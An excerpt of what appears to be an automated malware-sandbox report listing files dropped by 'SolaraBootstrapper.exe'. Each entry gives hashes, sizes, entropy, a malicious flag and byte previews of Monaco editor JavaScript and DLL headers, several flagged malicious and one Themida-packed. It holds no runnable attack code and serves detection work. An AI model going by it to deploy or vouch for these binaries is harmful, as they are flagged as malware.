                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-json version: 2.1.1(0e6ea95f4f4e093db9201c502e8d401391803233). * Released under the MIT license. * https://github.com/Microsoft/monaco-json/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/language/json/workerManager",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var u=monaco.Promise,n=function(){function e(e){var t=this;this._defaults=e,this._worker=null,this._idleCheckInterval=setInterval(function(){return t._checkIfIdle()},3e4),this._lastUsedTime=0,this._configChangeListener=this._defaults.onDidChange(function(){return t._stopWorker()})}return e.prototype._stopWorker=function(){this._worker&&(this._worker.dispose(),this._worker=null),this._client=null},e.prototype.dispose=function(){clearInterval(this._idleCheckInter
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65139)
                                                  Category:dropped
                                                  Size (bytes):102259
                                                  Entropy (8bit):5.245411424016145
                                                  Encrypted:false
                                                  SSDEEP:1536:rIAGGhzNFVAg0Edqq6L05i4Xw9dA+IKFt:cRyzNFV5jXOA+IKT
                                                  MD5:61E9B732BEDC39B547804AC7E8897AAB
                                                  SHA1:187CBA5FBD9C31257119DDE24A28573B4973EF5C
                                                  SHA-256:7C6D37BB341CF59335F6A3E5E336D0DE863124FA40A8F9B5F29D8DA07891B649
                                                  SHA-512:200E32143BBCDA809B0003298AA561EBB27509D309168DE81AD8529476AB64CAEE0502B9FE0B513469C21B82EDB421B642183A250D2BA4D65C74BA4C1CBE39DC
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-json version: 2.1.1(0e6ea95f4f4e093db9201c502e8d401391803233). * Released under the MIT license. * https://github.com/Microsoft/monaco-json/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.!function(e){if("object"==typeof module&&"object"==typeof module.exports){var t=e(require,exports);void 0!==t&&(module.exports=t)}else"function"==typeof define&&define.amd&&define("vscode-languageserver-types/main",["require","exports"],e)}(function(e,t){"use strict";var a,r,n,o,i,s,u,c,f,l,p,h,d;Object.defineProperty(t,"__esModule",{value:!0}),(r=a=t.Position||(t.Position={})).create=function(e,t){return{line:e,character:t}},r.is=function(e){var t=e;return N.defined(t)&&N.number(t.line)&&N.number(t.character)},(o=n=t.Range||(t.Range={})).create=function(e,t,r,n){if(N.number(e)&&N.number(t)&&N.nu
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65127)
                                                  Category:dropped
                                                  Size (bytes):1683029
                                                  Entropy (8bit):5.332692808632381
                                                  Encrypted:false
                                                  SSDEEP:49152:G6qR6wZ7g2oZNDR3Oy4mtYsT2ACKRRrcLHd5:W61/4mTy
                                                  MD5:0A1A293455F5451BA11E07386EA62D4F
                                                  SHA1:D6A43C68812A3DCDDC2973DB3F2DD8A6B0E45F1E
                                                  SHA-256:90E98063C644749A948EDD5A7801F7B00C554E3189FE7C2811926B01EAF1B41F
                                                  SHA-512:1674E2AD75C53F99475743618EC59D90CE8EB262131C15DAEAD963ECB847CB70278A6D4608C66710C3CD5E92E03B5552A05401B6B008184DBF892683B27CA34A
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-typescript version: 3.1.0(64641eebb2d0dca62499cc1b822970ea72efbfce). * Released under the MIT license. * https://github.com/Microsoft/monaco-typescript/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.var __assign=this&&this.__assign||Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var a in t=arguments[r])Object.prototype.hasOwnProperty.call(t,a)&&(e[a]=t[a]);return e},__extends=this&&this.__extends||function(){var n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var r in t)t.hasOwnProperty(r)&&(e[r]=t[r])};return function(e,t){function r(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(r.prototype=t.prototype,new r)}}();!function(e){var t,r,n,a,i,o,s,c,u;(t=e.Comparison||(e.Comparison
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (19975)
                                                  Category:dropped
                                                  Size (bytes):20384
                                                  Entropy (8bit):5.167653869684314
                                                  Encrypted:false
                                                  SSDEEP:384:hgFzm27hrrEZAmdHpjHenNvaOm/6xS1oTEXx3KjFRMqxRh2l3eBVq1A8WKm3d5vp:2FyHhzHenNvaF6xCoSx3KjFqqxL21eBp
                                                  MD5:8C1A82479C380D2B2C6B096E12EE9632
                                                  SHA1:78E429DD4A9279267679423DDB0B6D06C11172AC
                                                  SHA-256:70957C5EDE2834ADF1B5BC264E119F82B4E8E6C169FC8FF140D637D1C5287BD9
                                                  SHA-512:409C8724ECFA045A7563B5C142EF0A107BFFE126140BCBE5202DAD59B9BA5EC0DB91C74C77D5A60BE92110B9D0C942FAC61A782EE30A4288774F547F303E1C4A
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-typescript version: 3.1.0(64641eebb2d0dca62499cc1b822970ea72efbfce). * Released under the MIT license. * https://github.com/Microsoft/monaco-typescript/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/language/typescript/tokenization",["require","exports","./lib/typescriptServices"],function(e,t,f){"use strict";var h,n;Object.defineProperty(t,"__esModule",{value:!0}),(n=h=t.Language||(t.Language={}))[n.TypeScript=0]="TypeScript",n[n.EcmaScript5=1]="EcmaScript5",t.createTokenizationSupport=function(e){var n=f.createClassifier(),r=e===h.TypeScript?i:s,o=e===h.TypeScript?a:c;return{getInitialState:function(){return new v(e,f.EndOfLineState.None,!1)},tokenize:function(e,t){return function(e,t,n,r,o){var i={tokens:[],endState:new v(r.language,f.EndOfLineState.None,!1)};functi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65127)
                                                  Category:dropped
                                                  Size (bytes):1776808
                                                  Entropy (8bit):4.928903604752642
                                                  Encrypted:false
                                                  SSDEEP:24576:pQIJc020hIvUjQQ0s2oI4Q0s2oI4QIJc020hIvUjQQ0s2oI4Q0s2oIq:Qo3MfgfHo3Mfgfq
                                                  MD5:1E0047691C3637AD1E0DA62023BA0E0D
                                                  SHA1:64902C923C2194E007BC727F7EA4F30B3A796DAB
                                                  SHA-256:2CCC6B6B1B5D884FE8DF3E7B2F2BACCA0C4529B68BBFE3C547FCC74F204CC5D1
                                                  SHA-512:C1BEF7BFD60ACFCFB206B9631F8A730B787E94101D519D157D346D8377104D1302C0E9853BA2DB944D63F03B181511950B9EA25DD21E41F40B4AEBA4BC44C0C8
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-typescript version: 3.1.0(64641eebb2d0dca62499cc1b822970ea72efbfce). * Released under the MIT license. * https://github.com/Microsoft/monaco-typescript/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/language/typescript/lib/lib-ts",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.contents='/*! *****************************************************************************\nCopyright (c) Microsoft Corporation. All rights reserved. \nLicensed under the Apache License, Version 2.0 (the "License"); you may not use\nthis file except in compliance with the License. You may obtain a copy of the\nLicense at http://www.apache.org/licenses/LICENSE-2.0 \n \nTHIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1024)
                                                  Category:dropped
                                                  Size (bytes):28566
                                                  Entropy (8bit):5.224786396048958
                                                  Encrypted:false
                                                  SSDEEP:768:3J6C/c2x0cAu57XQxJRDRi+R/TvrCv3zM2GRl0VEj:Z6grH7qTXRvmDI
                                                  MD5:8A3086F6C6298F986BDA09080DD003B1
                                                  SHA1:8C7D41C586BFA015FB5CC50A2FDC547711B57C3C
                                                  SHA-256:0512D9ED3E5BB3DAEF94AA5C16A6C3E2EE26FFED9DE00D1434FFE46A027B16B9
                                                  SHA-512:9E586742F4E19938132E41145DEEC584A7B8C7E111B3C6E9254F8D11DB632EBE4D66898458ED7BCFC0614D06E20EB33D5A6A8EB8B32D91110557255CF1DBF017
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/."use strict";var _amdLoaderGlobal=this;!function(e){e.global=_amdLoaderGlobal;var t=function(){function t(){this._detected=!1,this._isWindows=!1,this._isNode=!1,this._isElectronRenderer=!1,this._isWebWorker=!1}return Object.defineProperty(t.prototype,"isWindows",{get:function(){return this._detect(),this._isWindows},enumerable:!0,configurable:!0}),Object.defineProperty(t.prototype,"isNode",{get:function(){return this._detect(),this._isNode},enumerable:!0,configurable:!0}),Object.defineProperty(t.prototype,"isElectronRenderer",{get:function(){return this._detect(),this._isElectronRenderer},enumerable:!0,configurable:!0}),Object.defineProperty(t.pr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):711952
                                                  Entropy (8bit):5.967185619483575
                                                  Encrypted:false
                                                  SSDEEP:12288:GBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:GBjk38WuBcAbwoA/BkjSHXP36RMG/
                                                  MD5:195FFB7167DB3219B217C4FD439EEDD6
                                                  SHA1:1E76E6099570EDE620B76ED47CF8D03A936D49F8
                                                  SHA-256:E1E27AF7B07EEEDF5CE71A9255F0422816A6FC5849A483C6714E1B472044FA9D
                                                  SHA-512:56EB7F070929B239642DAB729537DDE2C2287BDB852AD9E80B5358C74B14BC2B2DDED910D0E3B6304EA27EB587E5F19DB0A92E1CBAE6A70FB20B4EF05057E4AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O......................../.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):137144
                                                  Entropy (8bit):6.122084762995293
                                                  Encrypted:false
                                                  SSDEEP:3072:e5i6Uab3sFhPk6vEmG1PU6dLXm2ng3esQDqEt2JljdTu:e5P2e6vERtUyTmHEtmI
                                                  MD5:A0BD0D1A66E7C7F1D97AEDECDAFB933F
                                                  SHA1:DD109AC34BEB8289030E4EC0A026297B793F64A3
                                                  SHA-256:79D7E45F8631E8D2541D01BFB5A49A3A090BE72B3D465389A2D684680FEE2E36
                                                  SHA-512:2A50AE5C7234A44B29F82EBC2E3CFED37BF69294EB00B2DC8905C61259975B2F3A059C67AEAB862F002752454D195F7191D9B82B056F6EF22D6E1B0BB3673D50
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...&.x`.........." ................@9....................................................`A........................................w.......i...(....`...................#...p......T...8.......................(....1..8........... .......h........................text............................... ..`.rdata.......0......................@..@.data...............................@....pdata..............................@..@.00cfg..(.... ......................@..@.gehcont4....0......................@..@.tls.........@......................@..._RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5464064
                                                  Entropy (8bit):6.520984736197837
                                                  Encrypted:false
                                                  SSDEEP:98304:Com1p/B6MvSmaRI+VcDNkq4pmvhAHDfyyrhl:W1HZNkq4p
                                                  MD5:AEAD90AB96E2853F59BE27C4EC1E4853
                                                  SHA1:43CDEDDE26488D3209E17EFFF9A51E1F944EB35F
                                                  SHA-256:46CFBE804B29C500EBC0B39372E64C4C8B4F7A8E9B220B5F26A9ADF42FCB2AED
                                                  SHA-512:F5044F2EE63906287460B9ADABFCF3C93C60B51C86549E33474C4D7F81C4F86CD03CD611DF94DE31804C53006977874B8DEB67C4BF9EA1C2B70C459B3A44B38D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,zh..........." ..0..VS..........uS.. ....S...... ........................S...........`.................................WuS.O.....S.T.....................S......tS.T............................................ ............... ..H............text....US.. ...VS................. ..`.rsrc...T.....S......XS.............@..@.reloc........S......^S.............@..B.................uS.....H...........|...........88..`<H...........................................(>...*^.(>..........%...}....*:.(>.....}....*:.(>.....}....*^.(>..........%...}....*:.(>.....}....*:.(>.....}....*v../.(>....,...f}....*..}....*"..}....*..s....*..s....*B../.(>....s....*F../.(>....fs....*b.{...../..{....f*.{....**.{.......*...0...........{......(....,....XX..*z.u....,..{.....y....{......*.*>.{.....{......*..{....*..(....*...0...........(....,..(....*.(.......(?...*...0..........r...p.(.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24616
                                                  Entropy (8bit):6.846605128431621
                                                  Encrypted:false
                                                  SSDEEP:384:WruyxWfhWMLm0GfeQ1MgKlx+YY30Jl0huSwp+M:PlRhg8Ihep+M
                                                  MD5:0485C463CD8D2AE1CBD42DF6F0591246
                                                  SHA1:EA634140905078E8F687A031AE919CFF23C27E6F
                                                  SHA-256:983F4D4C7B7330E7F5F091080C1E81905575EBCCD97E11DFF8A064979EC8D9B8
                                                  SHA-512:DDF947A1B86C3826859570A3E1D59E4EC4564CFCF25C84841383A4B5F5AD6C2FE618078416AED201FB744D5FBD6C39DAB7C1E964DD5E148DA018A825FCC0044A
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......n.........." .........................................................@.......M....`..........................................................0..................(D..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22568
                                                  Entropy (8bit):6.982006854843047
                                                  Encrypted:false
                                                  SSDEEP:384:W3q6nWm5CpWfhWNLm0Gf3Jl0huSwJ+Ruh91MgKlx+YV:l6nWm5Ce4RVheJUUwg8V
                                                  MD5:1193F810519FBC07BEB3FFBAD3247FC4
                                                  SHA1:DB099628A19B2D34E89028C2E16BC89DF28ED78F
                                                  SHA-256:AB2158FE6B354FB429F57F374CA25105B44E97EDCBDC1B752650D895DADD6FD1
                                                  SHA-512:3222A10C3BE5098ACA0211015EFE75CFBCD408FD28315ACEDD016D8F77513F81E207536B072001525965635DA39C4AAE8EF9F6AD367F5D695DE67B1614179353
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....`W.........." .........................................................0.......x....`.......................................................... ..................(D..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):21544
                                                  Entropy (8bit):6.9468057879019485
                                                  Encrypted:false
                                                  SSDEEP:384:WTY3eRWfhWILm0Gf/fReAplx4bZak3Jb1MgKlx+YgW:4GtRCaog8gW
                                                  MD5:A22F9A4CBD701209842B204895FEDF37
                                                  SHA1:72FA50160BAF1F2EA2ADCFF58F3F90A77A59D949
                                                  SHA-256:2EE3D52640D84AC4F7F7DDFE748F51BAA6FD0D492286C781251222420E85CA97
                                                  SHA-512:903755D4FA6651669295A10E66BE8EA223CD8D5AD60EBE06188D8B779FEF7E964D0AA26DC5479F14AAB655562D3C1EF76B86790FB97F991EAF52DA0F70E40529
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....n.p.........." .........................................................0............`.......................................................... ..................(D..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):21032
                                                  Entropy (8bit):7.013076607206084
                                                  Encrypted:false
                                                  SSDEEP:384:WyWfhWGLm0Gfdx46gl9iFoQ0E642zlxCHj0:ETRg1Goj0
                                                  MD5:BA17B278FFF2C18E34E47562DDDE8166
                                                  SHA1:BED762D11B98737FCF1D1713D77345EC4780A8C2
                                                  SHA-256:C36F5C0AC5D91A8417866DD4D8C670C2192BA83364693E7438282FB8678C3D1E
                                                  SHA-512:72516B81606CCF836549C053325368E93264FDEBC7092E42E3DF849A16CCEFA81B7156AE5609E227FAA7C9C1BF9D68B2AC349791A839F4575728F350DD048F27
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0............`.............................................e............ ..................(D..............T............................................................................rdata..u...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):29528
                                                  Entropy (8bit):6.6427838968097115
                                                  Encrypted:false
                                                  SSDEEP:384:WSQUbM4Oe59Ckb1hgmLVWfhWFLm0GfBOeAplx4bZe1TTTXZl1OS:vRMq59Bb1jycR5aCUS
                                                  MD5:C4CAC2D609BB5E0DA9017EBB535634CE
                                                  SHA1:51A264CE4545A2F0D9F2908771E01E001B4E763E
                                                  SHA-256:7C3336C3A50BF3B4C5492C0D085519C040878243E9F7D3EA9F6A2E35C8F1F374
                                                  SHA-512:3B55BDBC5132D05AB53852605AFE6ED49F4B3DECDDE8B11F19A621A78A37D98C7AEAAA8C10BF4565B9B50162816305FA5192EE31950A96DC08AE46BFC6AF4FFE
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Q............." .........,...............................................P............`..............................................%...........@...............0..XC..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):12064
                                                  Entropy (8bit):6.023451177450861
                                                  Encrypted:false
                                                  SSDEEP:192:+aajPrpJhhf4AN5/KiZWshWPBBbJz8Gjdv6suAH/7gq:+lbr7vWshWpB7dysuzq
                                                  MD5:894E538FBD29D9AF2DAC82ABBB798AA8
                                                  SHA1:3C28B3063CE80B3FD61E0AFC6934E3180F5BEF12
                                                  SHA-256:B12679D33126D2DCB0CD3625FCCF5C3AFC40D95C1BE36DC55F7471DE94929D23
                                                  SHA-512:32AD7F4BA21C7EC47B374ED776CC1662DE23A955A00AAB509D9B82A9F4AA4B46580933C3382A1CFFA526D93AF686013104CA1D8D50AB3BAB02A291E64B88A884
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d...J.E..........." .........................................................@............`.........................................0...4............0.................. ...............T............................................................................rdata..d...........................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26664
                                                  Entropy (8bit):6.801712192449325
                                                  Encrypted:false
                                                  SSDEEP:384:WnZpFVhXWfhW2Lm0Gfi3RKllGBwLeb+Jl0huSwpSs:a+rRlkLelhepSs
                                                  MD5:5DF2410C0AFD30C9A11DE50DE4798089
                                                  SHA1:4112C5493009A1D01090CCAE810500C765DC6D54
                                                  SHA-256:E6A1EF1F7C1957C50A3D9C1D70C0F7B0D8BADC7F279CD056EB179DC256BFEFDA
                                                  SHA-512:8ECB79078D05D5B2A432F511953985B3253D5D43D87709A5795709EE8DBCA63C5F1166ED94D8984C13F2EA06ADFA7D6B82C6735C23C6E64F2F37A257066864E6
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...U.x..........." ......... ...............................................@......H.....`.............................................a............0...............$..(D..............T............................................................................rdata..a...........................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26664
                                                  Entropy (8bit):6.800237451475615
                                                  Encrypted:false
                                                  SSDEEP:768:96S5yguNvZ5VQgx3SbwA71IkFD7RwL9il:9l5yguNvZ5VQgx3SbwA71IEVwL9il
                                                  MD5:AACADE02D7AAF6B5EFF26A0E3A11C42D
                                                  SHA1:93B8077B535B38FDB0B7C020D24BA280ADBE80C3
                                                  SHA-256:E71D517E6B7039437E3FC449D8AD12EEECA0D5C8ED1C500555344FD90DDC3207
                                                  SHA-512:E02FCBCB70100F67E65903D8B1A7E6314CABFB0B14797BD6E1C92B7BCB3994A54133E35D16DA0A29576145B2783221330591526F856B79A25C0575FC923985A6
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...<.L..........." ......... ...............................................@.......N....`..........................................................0...............$..(D..............T............................................................................rdata..............................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):34
                                                  Entropy (8bit):4.013070929103845
                                                  Encrypted:false
                                                  SSDEEP:3:oNt+kiE2J5xAIT:oNwkn23fT
                                                  MD5:3D79BBDD08CCA1FB02F286E7DFABF9A4
                                                  SHA1:3C960C8C5516E827EE904B1B0B573928D1FA748E
                                                  SHA-256:5C13EB5C78087957831881A8622CE904AAEA3421180768F7EF1D4F43C939BF6C
                                                  SHA-512:31996D7A764E0165D0C560853DCAA6C1EA31E230C7DC79CA09340AEC1DED2C6AEDE3BE950910138EB4C721BD45E4C579A139104785FE2FB5387C2981756123C5
                                                  Malicious:false
                                                  Preview:C:\Users\user\AppData\Local\Temp\
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):2.0
                                                  Encrypted:false
                                                  SSDEEP:3:ycn:yc
                                                  MD5:3A7387A95AB7C6BFE412D7D4B7C64CFE
                                                  SHA1:2A2FA86E064A4CCA1F2AACAB88632E542D5A4230
                                                  SHA-256:CC2504C261F94795AE0FCB9C4ECED78AFE10A96F12F5DFE8C4CB21B7A9115D82
                                                  SHA-512:E37C2A0CF92343FC27000773ED685A8A1F03372B3A7A2692028856D923A20301E54A2CE18BE863617E0324F4F78333141E0F79231A7C812932F3B0FE5D0D3C09
                                                  Malicious:false
                                                  Preview:2.39
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4452352
                                                  Entropy (8bit):7.969371737626035
                                                  Encrypted:false
                                                  SSDEEP:98304:DczAxotRZwAs0zLwOv62bZd+xyWZg1hdu5id31w:Dpo7HzUt0+xyrh8W31w
                                                  MD5:EDEB33E769C055CD02824B26EDEB5010
                                                  SHA1:8FE0E6AF65A2AC5AF81350D5CF158466E515691C
                                                  SHA-256:F888BAF11C6BAD29B57FBD03BE06D388D7838D1EE70949E7AB093628836639A7
                                                  SHA-512:CAE08DCBB4A61B81ED7D2554AC7C34A40A0F7C116E26429DD787052323FC73AFCAD8AAA52BADA0059853E95505DE4DF5AAD57EBDF929AD164A48E711551CBFE4
                                                  Malicious:true
                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........AD.h.D.h.D.h...k.P.h...m...h...l.e.h.D.h.E.h..jl.K.h..jk.V.h..jm...h...i.H.h. .i.G.h.D.i...h..m.K.h..ia.`.h..ih.E.h..i..E.h..ij.E.h.RichD.h.........................PE..d.....tf.........." ...'.N...~......X@w......................................P.......iD... .......................................... .......@.......P......lht.................................................................................................... $M.......................... ..` .....`...p..................@..@ $I...........T..............@... ....@...\...\..............@..@ ............................@..@ ............................@..@ L...........................@..B.edata....... ......................@..@.idata.......@......................@....rsrc........P......................@..@.themida..`..`......................`...
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):92160
                                                  Entropy (8bit):7.381646414313843
                                                  Encrypted:false
                                                  SSDEEP:1536:gea4Ta4b9I3BbbHVlnOXrPBdfeISRAOl801AbcsqD95wSxdRf3:gea4Ta4JMbb1lnOXrPXe7Yhq5Zf
                                                  MD5:D84E7F79F4F0D7074802D2D6E6F3579E
                                                  SHA1:494937256229EF022FF05855C3D410AC3E7DF721
                                                  SHA-256:DCFC2B4FA3185DF415855EC54395D9C36612F68100D046D8C69659DA01F7D227
                                                  SHA-512:ED7B0AC098C8184B611B83158EAA86619001E74DBA079D398B34AC694CE404BA133C2BAF43051840132D6A3A089A375550072543B9FAB2549D57320D13502260
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...q]............"...0..`............... .....@..... ....................................`...@......@............... ...............................................................~..8............................................................ ..H............text...L_... ...`.................. ..`.rsrc................b..............@..@........................................H........5...3...........h...............................................0..5........{....,.*..}.....r...p.s....(....r!..p.s.......(....*Js....%o....o....&*..(....*..(....*.0..A........(....(..........(.....(.....(.....(.....(............s ...(!...*....0..-.......rY..p("......+....%o#...o$.....X....i2...&..*...........))..!....rc..pr...p.. (%....3..(....*..o&...*....0..+.........('...}.......}.......}......|......(...+*..0..........~....("......,....*.*....0..9.......s).....~....o*..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):821760
                                                  Entropy (8bit):6.046120172014024
                                                  Encrypted:false
                                                  SSDEEP:6144:AOS6x0q6x9xNt587J72oHDH6CpoucA8OdtrFxU:TS6xp7lFR8ODE
                                                  MD5:203400107A2717D8F4F00A7DF6969739
                                                  SHA1:AADDE2FD6E8E363960D13DE1D603A63E56C0C2E9
